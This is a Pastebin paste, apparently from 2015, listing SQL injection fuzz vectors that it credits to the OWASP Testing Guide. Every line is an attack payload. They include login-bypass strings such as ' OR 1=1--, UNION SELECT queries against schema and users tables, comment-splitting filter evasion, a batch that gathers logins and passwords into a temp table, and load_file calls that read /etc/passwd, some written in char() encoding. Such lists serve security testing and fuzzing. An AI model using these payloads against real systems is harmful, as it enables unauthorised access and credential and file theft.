Advertisement
Guest User

Cybrary.it

a guest
Aug 10th, 2015
1,974
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.74 KB | None | 0 0
  1. Cybrary.it - MarkSnow
  2.  
  3. This list was copy pasted from https://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors#Passive_SQL_Injection_.28SQP.29
  4.  
  5. '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
  6. ||6
  7. '||'6
  8. (||6)
  9. ' OR 1=1--
  10. OR 1=1
  11. ' OR '1'='1
  12. ; OR '1'='1'
  13. %22+or+isnull%281%2F0%29+%2F*
  14. %27+OR+%277659%27%3D%277659
  15. %22+or+isnull%281%2F0%29+%2F*
  16. %27+--+
  17. ' or 1=1--
  18. " or 1=1--
  19. ' or 1=1 /*
  20. or 1=1--
  21. ' or 'a'='a
  22. " or "a"="a
  23. ') or ('a'='a
  24. Admin' OR '
  25. '%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
  26. ) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
  27. ' having 1=1--
  28. ' having 1=1--
  29. ' group by userid having 1=1--
  30. ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
  31. ' or 1 in (select @@version)--
  32. ' union all select @@version--
  33. ' OR 'unusual' = 'unusual'
  34. ' OR 'something' = 'some'+'thing'
  35. ' OR 'text' = N'text'
  36. ' OR 'something' like 'some%'
  37. ' OR 2 > 1
  38. ' OR 'text' > 't'
  39. ' OR 'whatever' in ('whatever')
  40. ' OR 2 BETWEEN 1 and 3
  41. ' or username like char(37);
  42. ' union select * from users where login = char(114,111,111,116);
  43. ' union select
  44. Password:*/=1--
  45. UNI/**/ON SEL/**/ECT
  46. '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
  47. '; EXEC ('SEL' + 'ECT US' + 'ER')
  48. '/**/OR/**/1/**/=/**/1
  49. ' or 1/*
  50. +or+isnull%281%2F0%29+%2F*
  51. %27+OR+%277659%27%3D%277659
  52. %22+or+isnull%281%2F0%29+%2F*
  53. %27+--+&password=
  54. '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
  55. @var select @var as var into temp end --
  56.  
  57. ' and 1 in (select var from temp)--
  58. ' union select 1,load_file('/etc/passwd'),1,1,1;
  59. 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
  60. ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement